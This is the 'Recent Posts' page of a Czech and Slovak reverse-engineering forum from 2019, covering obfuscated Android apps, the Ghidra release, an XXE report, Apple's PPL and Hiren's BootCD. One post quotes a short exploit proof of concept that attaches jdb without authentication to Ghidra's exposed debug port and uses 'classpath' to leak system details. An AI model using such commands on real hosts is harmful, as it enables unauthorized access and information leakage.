Recent Posts

Pages: 1 ... 7 8 [9] 10
81
General Discussion / Reverzení obfuskovaných androidích kódů
« Last post by RubberDuck on March 08, 2019, 09:37:18 PM »
Nemá tady někdo zkušenosti (případně odkazy na materiály) s reverzením obfuskovaných Android aplikací? Existují deobfuskátory, ale příjde mi, že si na tom taky vylámou zuby. Zkoušel jsem třeba zachytit komunikaci se serverem přes Wireshark, takže vím, že tam nějaká probíhá, ale v kódu jsem se k žádným stěžejním stringům nedostal, pokud pominu public certifikát pro šifrovanou komunikaci. Dokonce jsem si všíml částí kódu, které nedokázaly tyto tooly dekompilovat a nořit se do bajtkódu se mi úplně nechce :)
82
Tools / Re: Ghidra
« Last post by RubberDuck on March 08, 2019, 10:11:57 AM »
Tak zatím to vypadá, že těch problémů bude víc, než bych čekal  :-X

Aktuálně byla nalezena zranitelnost XXE
https://twitter.com/sghctoma/status/1103392091009413120
83
Tools / Re: Ghidra
« Last post by RubberDuck on March 08, 2019, 01:48:49 AM »
84
Tools / Re: Ghidra
« Last post by RubberDuck on March 07, 2019, 01:20:12 PM »
85
Tools / Re: Ghidra
« Last post by DARKER on March 07, 2019, 07:40:50 AM »
Myslim si, ze sa im nema o to kto starat, testovat im to, vyvijat, napady ...
Takto sa im o to postaraju ludia, spravia uzitocne pluginy ...
Cim viac sa to bude pouzivat tym to bude vymakanejsie ...
Som zvedavy ako na to zareaguje Ilfak ... (IDA)
86
Tools / Re: Ghidra
« Last post by RubberDuck on March 07, 2019, 03:36:14 AM »
Quote
NSA RE Tool 'GHIDRA' Backed Port - Java Debug Wire Protocol (JDWP) Port Opened(TCP/18001)

Exploit PoC:
jdb -attach x.x.x.x:18001 <= No auth

$ jdb -attach x.x.x.x:18001
Set uncaught java.lang.Throwable
Set deferred uncaught java.lang.Throwable
Initializing jdb ...
>

Information leaks can be leveraged to determine details about the remote OS
platform and Java installation configuration through the "classpath" command.

> classpath
base directory: C:\Windows\system32
classpath: [ ** MASKED ** list of jar's loaded in remote JVM ]
bootclasspath: [ ** MASKED ** list of JRE paths ]
>
87
Tools / Re: Ghidra
« Last post by RubberDuck on March 07, 2019, 03:27:52 AM »
Už jsem na to koukal a musím říct, že to vypadá dost dobře. A pokud kolem toho vznikne komunita, bude to velká pecka.

Jen jsem přemýšlel, proč to vlastně uvolňovali. Napadly mě asi dvě možnosti:
1. Hledají nové lidi na konkrétní pozice spojené s RCE
2. Mají něco lepšího (pokud to skutečně vyvíjejí od roku 2000, je to skoro 20 let stará aplikace) a rozhodli se tohle věnovat veřejnosti, aby byli zase jednou za ty hodné
88
Tools / Ghidra
« Last post by DARKER on March 06, 2019, 08:07:57 AM »
89
Off topic / Explaining Apple's Page Protection Layer in A12 CPUs
« Last post by RubberDuck on March 04, 2019, 03:04:57 PM »
 A detailed write up and tutorial on reverse engineering Apple's Page Protection Layer (PPL) in iOS12 and A12 chips,

Apple's A12 kernelcaches, aside from being "1469"-style (monolithic and stripped), also have additional segments marked PPL.

http://newosxbook.com/articles/CasaDePPL.html
90
Tools / Hiren’s BootCD PE x64 (Windows 10)
« Last post by DARKER on February 25, 2019, 03:02:20 PM »
Hiren’s BootCD PE (Preinstallation Environment) is a restored edition of Hiren’s BootCD based on Windows 10 PE x64. Since there are no official updates after November 2012, PE version is being developed by Hiren’s BootCD fans. It includes the least, best and updated free tools used in Hiren’s BootCD. It is being developed for the new age computers, it supports UEFI booting and requires minimum 2 GB RAM.

https://www.hirensbootcd.org/download/
Pages: 1 ... 7 8 [9] 10